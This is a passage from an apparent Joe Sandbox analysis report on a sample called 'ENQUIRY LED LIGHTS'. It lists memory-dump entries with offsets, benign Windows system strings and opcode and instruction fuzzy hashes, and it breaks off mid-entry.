                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: MUI
                                                                                                  • API String ID: 0-1339004836
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID: 0-3916222277
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID: 0-3916222277
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: GlobalTags
                                                                                                  • API String ID: 0-1106856819
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .mui
                                                                                                  • API String ID: 0-1199573805
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: EXT-
                                                                                                  • API String ID: 0-1948896318
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: BinaryHash
                                                                                                  • API String ID: 0-2202222882
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #
                                                                                                  • API String ID: 0-1885708031
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: BinaryName
                                                                                                  • API String ID: 0-215506332
                                                                                                  Strings
                                                                                                  • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 02FAAF2F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                  • API String ID: 0-1911121157
                                                                                                  Strings
                                                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 02F9895E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                  • API String ID: 0-702105204
                                                                                                  • Instruction ID: 4b92d53c400ac66c9688b7cf8f50f4e631dd8537f9227fa6e426ef0bd384a1ad
                                                                                                  • Opcode Fuzzy Hash: bcc5d6ac3e5c7775c7d043873c97d760a86e8c64c3ff68dc99923d327a6ba2f1
                                                                                                  • Instruction Fuzzy Hash: 9DD102B2E016199BDB04CF58C861BFEB7F1BF883C4F188169DA56A7240E775E901CB60
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d8b5401ac61a44941342a2749eac2bf3e1770c20e069c3222882d983b6bfae84
                                                                                                  • Instruction ID: 25cc33bcb9ecffaa1a3ece48f0f2de1dc1ae36f33ca19200ef4e3dcddabce3dc
                                                                                                  • Opcode Fuzzy Hash: d8b5401ac61a44941342a2749eac2bf3e1770c20e069c3222882d983b6bfae84
                                                                                                  • Instruction Fuzzy Hash: 15E18C71A08341CFC714CF28C490A6ABBE5BF89394F85896DEA99CB351DB31E905CF91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b4be26b93b7af08592c3dc7476ecf62781cc0a33bbb4020f4a77a08892820ddc
                                                                                                  • Instruction ID: 87d775b7d90eec660748b026b066557e93cf6ecaf053d625522824d164099ed8
                                                                                                  • Opcode Fuzzy Hash: b4be26b93b7af08592c3dc7476ecf62781cc0a33bbb4020f4a77a08892820ddc
                                                                                                  • Instruction Fuzzy Hash: F1D1A472A0061A9BCB14DF64CCD0ABA73A5EF443D8F054669EB15EB2C0EB34E945DF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                  • Instruction ID: 587753bf5fd1a3f80846d70e898c6ec01b53a8c4277aac04df41ccd0502dbdbf
                                                                                                  • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                  • Instruction Fuzzy Hash: 3EB15375A006049FEF24DF95C940EABB7B6BF863C4F104469AA42E7790DB35ED49CB10
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                  • Instruction ID: 1290b28b6bf7024a2bf622e1a8415444245f297304b1420f7374a666833d3226
                                                                                                  • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                  • Instruction Fuzzy Hash: 7CB1E532B00659AFDB25DBA4C850BBEBBF6AF45384F1401A9D7529B381DB30E945CB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 53135285ed822afe1ed089ff769d5a4b3b3b5ef47f5cff86267649d9b4f67335
                                                                                                  • Instruction ID: aacc7477b39dc7fc4d4c63ca1261dea3997c3b1c7ee17b990604af94dc694e01
                                                                                                  • Opcode Fuzzy Hash: 53135285ed822afe1ed089ff769d5a4b3b3b5ef47f5cff86267649d9b4f67335
                                                                                                  • Instruction Fuzzy Hash: CFC126756083408FE764CF14C584BABB7E5FF88384F44495EEA8987290DB74E908CF92
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f7a629862a101bdea12b752c2ebdd3cc285090a3cb9d235e26edbf7465d312f5
                                                                                                  • Instruction ID: c08b4e5a4a94b992a409b7d4d9ca9768c2b9f4a60fda4695998e752ab0e4d8bd
                                                                                                  • Opcode Fuzzy Hash: f7a629862a101bdea12b752c2ebdd3cc285090a3cb9d235e26edbf7465d312f5
                                                                                                  • Instruction Fuzzy Hash: A2B15274A002658BDB34DF54C990BBDB3B6EF44784F1485EAD60AA7390DB709D85DF20
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4c71a3ec96fbbf8c951226f4fce34913c132e516610fd4af9fd58fbdab29b56d
                                                                                                  • Instruction ID: 963341a7eea6f1905863ff7e70003c0e68ced4b98648f4d28ce08ad994464198
                                                                                                  • Opcode Fuzzy Hash: 4c71a3ec96fbbf8c951226f4fce34913c132e516610fd4af9fd58fbdab29b56d
                                                                                                  • Instruction Fuzzy Hash: 70A13671E006589FEB22DB98C844BAEB7A5AF057D8F040262EB11AB6D1D7749D40CFD1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 335a450d906f4b31798af95f32b8caacfbee952952396e2aed92bdda1d654249
                                                                                                  • Instruction ID: af3aff519120da1ac2814ea0a6d0135d6bbecb00e646425666a6c848622e50bf
                                                                                                  • Opcode Fuzzy Hash: 335a450d906f4b31798af95f32b8caacfbee952952396e2aed92bdda1d654249
                                                                                                  • Instruction Fuzzy Hash: 51A1A071B016269BDB24DF65C991BBAB7A5FF48398F00402DEF4597381EB74E812CB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bb02be5fe995d2a80e9b009e7b432c3a042f58b9bff55ac9c6686a10d98d4818
                                                                                                  • Instruction ID: bb316859944a57b1efe7e26fb46f1b4d26431a670f584ef7f1550c295d9af4c7
                                                                                                  • Opcode Fuzzy Hash: bb02be5fe995d2a80e9b009e7b432c3a042f58b9bff55ac9c6686a10d98d4818
                                                                                                  • Instruction Fuzzy Hash: FDA1BB72A04651AFCB12DF24CD80B2AB7EAFF49788F41052CEA969B650C734E940CF91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5e4dce7257e663dc7dce3ceb29d56d921621544ead20489810e9ccdf57452d79
                                                                                                  • Instruction ID: 785a2b49e5c816f96cdeb5cde4f9d99bf448cffa491bb88689623dc3cf09189f
                                                                                                  • Opcode Fuzzy Hash: 5e4dce7257e663dc7dce3ceb29d56d921621544ead20489810e9ccdf57452d79
                                                                                                  • Instruction Fuzzy Hash: 02918271E00219AFEF15CF68DC84BAEBBB9AB48794F154169E710EB341D734E9409FA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3812da4d367bf68894cb1f8dc40aa48c5aec82a07bc00e3361d7cacee16c668d
                                                                                                  • Instruction ID: 2abf247c17b7a09f7fec47a612b5e98fef91d60e082ecc4f44ee13bbb4db76be
                                                                                                  • Opcode Fuzzy Hash: 3812da4d367bf68894cb1f8dc40aa48c5aec82a07bc00e3361d7cacee16c668d
                                                                                                  • Instruction Fuzzy Hash: F0912536E006258BE724DF18C950B7DB7A6EF8A794F254066EE05DB380EB74E809CB50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 662a26946c382759a79b30895ff2ba7c52e4cfc2515df6be50a231abd25f91d2
                                                                                                  • Instruction ID: 9745f68a8283c189aa84d7e5b2d6a6380aa16ba40ef791b19834aa6d22b5977f
                                                                                                  • Opcode Fuzzy Hash: 662a26946c382759a79b30895ff2ba7c52e4cfc2515df6be50a231abd25f91d2
                                                                                                  • Instruction Fuzzy Hash: 5F8193B1E006269BDB18CF69C944ABEBBF9FF48744F14852EE545E7640E338D940CBA4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                  • Instruction ID: b7ecfd97e1418d5a57494dc6d7aee92088959dc5c6f27e9b26ef2e0322166f2d
                                                                                                  • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                  • Instruction Fuzzy Hash: 58818071B002099FCF18DF99C880AAEB7B7FF84354F188569DA169B384DB74E902CB54
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 55eeb8982e23603af6615a1163f7c3fb9ffe24d7ff71e10972af9dfa9d7e2ac2
                                                                                                  • Instruction ID: 41d429359c1f2ccfda972f28063ccb545137ec0e852dfe4090247ce699b672cb
                                                                                                  • Opcode Fuzzy Hash: 55eeb8982e23603af6615a1163f7c3fb9ffe24d7ff71e10972af9dfa9d7e2ac2
                                                                                                  • Instruction Fuzzy Hash: E9814271E00609AFDB25DFA5C880BEEBBFAFF48394F104429E655A7250DB70AD45CB50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7db08b7244336a5439e1322781402ad83da3f3e8bac678418badf73a914d63a8
                                                                                                  • Instruction ID: 04cd57790ec7b9af814f9967bac15a3fbb747c71b627c8b5b0f2a47acca329f1
                                                                                                  • Opcode Fuzzy Hash: 7db08b7244336a5439e1322781402ad83da3f3e8bac678418badf73a914d63a8
                                                                                                  • Instruction Fuzzy Hash: 4A71EE75D01629DBCB25CF59C8907BEBBB5FF49784F15411BEA46AB350E3349804CBA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: af6033d900b0a0085623b1022d8898bc9ae19b9833d8578dedcd694c05f7e04b
                                                                                                  • Instruction ID: bed219aa8acf6d57e7938d861391f288c7d15231fe5e5e84aa6d5e138c4e7cd7
                                                                                                  • Opcode Fuzzy Hash: af6033d900b0a0085623b1022d8898bc9ae19b9833d8578dedcd694c05f7e04b
                                                                                                  • Instruction Fuzzy Hash: EC717270D0120AEFDB14DF95DA60E5ABBFAEB81398F21415FE724A7298C7368900DF54
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d707b2d7429f1005daada501f317602a3baa61b3531a130517143ad66724621d
                                                                                                  • Instruction ID: d42fe20094190b02b78f169601fc4a2fbd8e4fd03edcd0d25677e4636f5399a9
                                                                                                  • Opcode Fuzzy Hash: d707b2d7429f1005daada501f317602a3baa61b3531a130517143ad66724621d
                                                                                                  • Instruction Fuzzy Hash: 6941D8716007059FD725CF24C860A26B7F9FF49398B908A6DDA4787754EB30F885CB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: da19c77239d95473cf8dca4897a7ff7cf01a4d7e64aa79334eba84b68c6bc646
                                                                                                  • Instruction ID: b0687672a7602a0557f749fed4c56c8776c088480b3a5f8256527b6f1fa20fbd
                                                                                                  • Opcode Fuzzy Hash: da19c77239d95473cf8dca4897a7ff7cf01a4d7e64aa79334eba84b68c6bc646
                                                                                                  • Instruction Fuzzy Hash: D441E232A41214CFDB16EF69D990BBE77B1FB483A8F040196DA51AB391DB399900CF64
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5a884459f148b75327adcc57f4092c7b24f952efba082da98e2c83f4fd43ca87
                                                                                                  • Instruction ID: cf60e358d841cd8e0bbcd051d5eb40b77e1f4d7615d875e9604bdc792b700417
                                                                                                  • Opcode Fuzzy Hash: 5a884459f148b75327adcc57f4092c7b24f952efba082da98e2c83f4fd43ca87
                                                                                                  • Instruction Fuzzy Hash: A3410732A02301CBE714EF59C980A7AB7B6FF847C8F54812AEB015B655D779D942CF90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 77e0f4dd6f3fbafb8c33b295158c1eac759b03c06df96a140d8dcb106ea30b0c
                                                                                                  • Instruction ID: bd20c663eedf673feada92757f1de75b94aafb1a2db97d10fee49dae43336186
                                                                                                  • Opcode Fuzzy Hash: 77e0f4dd6f3fbafb8c33b295158c1eac759b03c06df96a140d8dcb106ea30b0c
                                                                                                  • Instruction Fuzzy Hash: DB4162729083459ED311DF64C894A6BF7E9EF88BD4F40092AFA84E7190E730DE448B93
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                  • Instruction ID: 07d8258121b562de068a4c562d43457fc2c23b497420cf797d7f32ee86dabef7
                                                                                                  • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                  • Instruction Fuzzy Hash: FF410732E00315DFDB10DBA4C484BBEB762EB54BD8F55806AEB45EB291D7318D40DB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f06fdc72d247018dd335606dbfaa9706a3a85b18ebf2551fb82811efd6a8a849
                                                                                                  • Instruction ID: cb588a7820c6e15336f5c28e7e44a1addfc6f3ad58e996dca3ab1c50666f070a
                                                                                                  • Opcode Fuzzy Hash: f06fdc72d247018dd335606dbfaa9706a3a85b18ebf2551fb82811efd6a8a849
                                                                                                  • Instruction Fuzzy Hash: DB417D71A40600EFD721CF18C850B26B7F5FF44794FA0856EEA49CB290EB71E982CB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                  • Instruction ID: f3c1cdba7f6b43903bfbc4d48390158c5eb2142934bddb15818a8630b3ee084c
                                                                                                  • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                  • Instruction Fuzzy Hash: 15410A71A00609EFDB28CF98C980EAABBF5EF08744B10456DE756D7650DB70AA44CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2fec0a827ec8a1b81a26fda092a656f4c2fe4fc4e429dad969b5e453902cd5c9
                                                                                                  • Instruction ID: c5262c8940b40f788bbb3cc126644e54bbbbe86e5c437146350a8fe98b26d595
                                                                                                  • Opcode Fuzzy Hash: 2fec0a827ec8a1b81a26fda092a656f4c2fe4fc4e429dad969b5e453902cd5c9
                                                                                                  • Instruction Fuzzy Hash: 4341F471A01718CFDB21EFA4D940B6AB7F2FF45394F5082AACA169B6E0DB309941CF41
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7874614dbe075e77f81d1156e8f871278e4d262bbbd7510dd9d1a0409f765679
                                                                                                  • Instruction ID: b00540fa99c29b487d4151b807de6500f5e8704278418f1d4e4f960a16e9d421
                                                                                                  • Opcode Fuzzy Hash: 7874614dbe075e77f81d1156e8f871278e4d262bbbd7510dd9d1a0409f765679
                                                                                                  • Instruction Fuzzy Hash: B131CBB2A01304EFDB11DF98C540799BBF1FB09798F2080AAD219EB251D772D902CF90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 34c7707cb1464e162e86b13887f07ea6733edb2411bb08cef1fc4fa278e818d2
                                                                                                  • Instruction ID: 53783349e8992c55c38412c1b71a05ad0355cca94039d102fc0659da2f11d5c9
